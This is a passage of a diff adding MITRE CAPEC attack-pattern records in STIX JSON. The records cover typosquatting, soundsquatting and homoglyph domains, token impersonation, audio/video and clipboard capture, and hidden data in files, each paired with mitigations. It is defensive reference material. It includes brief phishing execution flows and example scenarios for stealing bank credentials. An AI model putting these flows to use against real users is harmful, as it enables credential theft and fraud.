website, which appears as if it is the legitimate paypal.com login page.\n The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user's legitimate paypal credentials to log into the user's account and steal any money which may be in the account.\n TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

    2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the TypoSquatted URL.

    2. Techniques
    Register the TypoSquatted domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the TypoSquatted domain.

    2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the TypoSquatted domain.
    Assume that a user will incorrectly type the legitimate URL, leading the user to the TypoSquatted domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase potential TypoSquatted domains and forward to legitimate domain.", + "id": "course-of-action--57146b6f-bca0-47d6-9268-5475bdf66db1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-630-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2442a11-1be7-42c6-b9e8-d6e757681156", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--57146b6f-bca0-47d6-9268-5475bdf66db1", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user's confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "external_id": "CAPEC-631", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/631.html" + }, + { + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "external_id": "REF-491", + "source_name": "reference_from_CAPEC", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf" + } + ], + "id": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "SoundSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homophone Attack" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful SoundSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate guaranteebanking.com login page.\n The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user's legitimate guaranteebanking.com credentials to log into the user's account and steal any money which may be in the account.See also: SoundSquatting vulnerability allows an adversary to impersonate a trusted domain and leverages a user's confusion between the meaning of two words which are pronounced the same into visiting the malicious website to steal user credentials." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted, receives a consistent amount of traffic, and is a homophone.

    2. Techniques
    Research popular or high traffic websites which are also homophones.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the SoundSquatted URL.

    2. Techniques
    Register the SoundSquatted domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the SoundSquatted domain.

    2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the SoundSquatted domain.
    Assume that a user will unintentionally use the homophone in the URL, leading the user to the SoundSquatted domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73bbe3cf-9d46-458f-b272-44e8c8bdbfdd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase potential SoundSquatted domains and forward to legitimate domain.", + "id": "course-of-action--4e3cac99-a7ec-420d-935d-3db74d0bb10a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-631-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a91eb59a-9010-4d4f-baca-16b413704ed6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e3cac99-a7ec-420d-935d-3db74d0bb10a", + "target_ref": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.", + "external_references": [ + { + "external_id": "CAPEC-632", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/632.html" + }, + { + "external_id": "CWE-1007", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1007.html" + } + ], + "id": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Homograph Attack via Homoglyphs", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homoglyph Attack" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful Homograph attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is bankofamerica.com, where the 'a' and 'e' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.\n The user is directed to the adversary's website, which appears as if it is the legitimate bankofamerica.com login page.\n The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user's legitimate bankofamerica.com credentials to log into the user's account and steal any money which may be in the account.\n Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials.See also: CVE-2012-0584 CVE-2009-0652 CVE-2005-0233 CVE-2005-0234 CVE-2005-0235 CVE-2005-0236 CVE-2005-0237 CVE-2005-0238" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

    2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the URL containing the homoglpyh character(s).

    2. Techniques
    Register the Homograph domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the Homograph domain.

    2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the to click on a link leading the user to the malicious domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc79c713-e3ec-414c-8426-5e3cdf4a0f13", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize browsers that can warn users if URLs contain characters from different character sets.", + "id": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-632-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.", + "external_references": [ + { + "external_id": "CAPEC-633", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/633.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + } + ], + "id": "attack-pattern--bec2babe-f38d-49ed-a901-4c7dbbe87b1e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Token Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic (By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed.)", + "Gain Privileges (By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had.)", + "Hide Activities (Faking the source of data or services can be used to create a false trail in logs as the target will associated any actions with the impersonated identity instead of the adversary.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "This pattern of attack is only applicable when a downstream user leverages tokens to verify identity, and then takes action based on that identity." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary exploits the target system's audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. Skype) on a system.", + "external_references": [ + { + "external_id": "CAPEC-634", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/634.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Audio Capture", + "external_id": "T1123", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1123" + }, + { + "description": "Video Capture", + "external_id": "T1125", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1125" + }, + { + "description": "Amrita Mitra, What is Car Whisperer?, 2017--03---08, The Security Buddy", + "external_id": "REF-653", + "source_name": "reference_from_CAPEC", + "url": "https://www.thesecuritybuddy.com/bluetooth-security/what-is-car-whisperer/" + }, + { + "description": "What is Bluesnarfing?, 2017--03---13, Finjan Mobile", + "external_id": "REF-654", + "source_name": "reference_from_CAPEC", + "url": "https://www.finjanmobile.com/what-is-bluesnarfing/" + } + ], + "id": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Probe Audio and Video Peripherals", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability.", + "An adversary can capture and record from audio peripherals in a vehicle via a Car Whisperer attack. If an adversary is within close proximity to a vehicle with Bluetooth capabilities, they may attempt to connect to the hands-free system when it is in pairing mode. With successful authentication, if an authentication system is present at all, an adversary may be able to play music/voice recordings, as well begin a recording and capture conversations happening inside the vehicle. Successful authentication relies on the pairing security key being set to a default value, or by brute force (which may be less practical in an outside environment) Depending on the sensitivity of the information being discussed, this scenario can be extremely compromising.", + "An adversary may also use a technique called Bluebugging, which is similar to Bluesnarfing but requires the adversary to be between 10-15 meters of the target device. Bluebugging creates a backdoor for an attacker to listen/record phone calls, forward calls, send SMS and retrieve the phonebook." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Knowledge of the target device's or application’s vulnerabilities that can be capitalized on with malicious code. The adversary must be able to place the malicious code on the target device." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect audio and video data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown code from executing on a system through the use of an allowlist policy.", + "id": "course-of-action--d2376771-bf07-4a50-828d-05fdda76a87f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbf046fa-0379-4600-9440-4e02b4dba1f4", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2376771-bf07-4a50-828d-05fdda76a87f", + "target_ref": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch installed applications as soon as new updates become available.", + "id": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-634-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4780d621-4627-424b-903c-3f4d714d86a1", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "target_ref": "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-635", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/635.html" + }, + { + "external_id": "CWE-162", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/162.html" + }, + { + "description": "Masquerading: Double File Extension", + "external_id": "T1036.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/007" + } + ], + "id": "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Alternative Execution Due to Deceptive Filenames", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70" + ], + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.", + "id": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-635-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d2c9b192-26b4-46a5-a6c9-aca496c5e896", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ef2d26f-fc33-4b45-8b2f-ea08dd776b12", + "target_ref": "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.", + "external_references": [ + { + "external_id": "CAPEC-636", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/636.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Data Obfuscation: Steganography", + "external_id": "T1001.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1001/002" + }, + { + "description": "Obfuscated Files or Information: Steganography", + "external_id": "T1027.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/003" + }, + { + "description": "Obfuscated Files or Information: Compile After Delivery", + "external_id": "T1027.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/004" + }, + { + "description": "Signed Binary Proxy Execution: Compiled HTML File", + "external_id": "T1218.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1218/001" + }, + { + "description": "Template Injection", + "external_id": "T1221", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1221" + }, + { + "description": "Means, Ryan L., Alternate Data Streams: Out of the Shadows and into the Light, SANS Institute", + "external_id": "REF-493", + "source_name": "reference_from_CAPEC", + "url": "https://www.giac.org/paper/gcwn/230/alternate-data-streams-shadows-light/104234" + } + ], + "id": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Hiding Malicious Data or Code within Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87" + ], + "x_capec_prerequisites": [ + "The operating system must support a file system that allows for alternate data storage for a file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools.", + "id": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-636-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "target_ref": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which they are unauthorized.", + "external_references": [ + { + "external_id": "CAPEC-637", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/637.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Clipboard Data", + "external_id": "T1115", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1115" + } + ], + "id": "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Collect Data from Clipboard", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an application that allows copying sensititve data to clipboad: An adversary first needs to find an application that allows copying and pasting of sensitive information. This could be an application that prints out temporary passwords to the screen, private email addresses, or any other sensitive information or data

Experiment

  1. Target users of the application: An adversary will target users of the application in order to obtain the information in their clipboard on a periodic basic

    2. Techniques
    Install malware on a user's system designed to log clipboard contents periodically
    Get the user to click on a malicious link that will bring them to an application to log the contents of the clipboard

Exploit

  1. Follow-up attack: Use any sensitive information found to carry out a follow-up attack

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have a means (i.e., a pre-installed tool or background process) by which to collect data from the clipboard and store it. That is, when the target copies data to the clipboard (e.g., to paste into another application), the adversary needs some means of capturing that data in a third location." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect clipboard data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.", + "id": "course-of-action--59dd4ce4-6777-41cd-ae1f-56718a9b85a1", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-637-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": 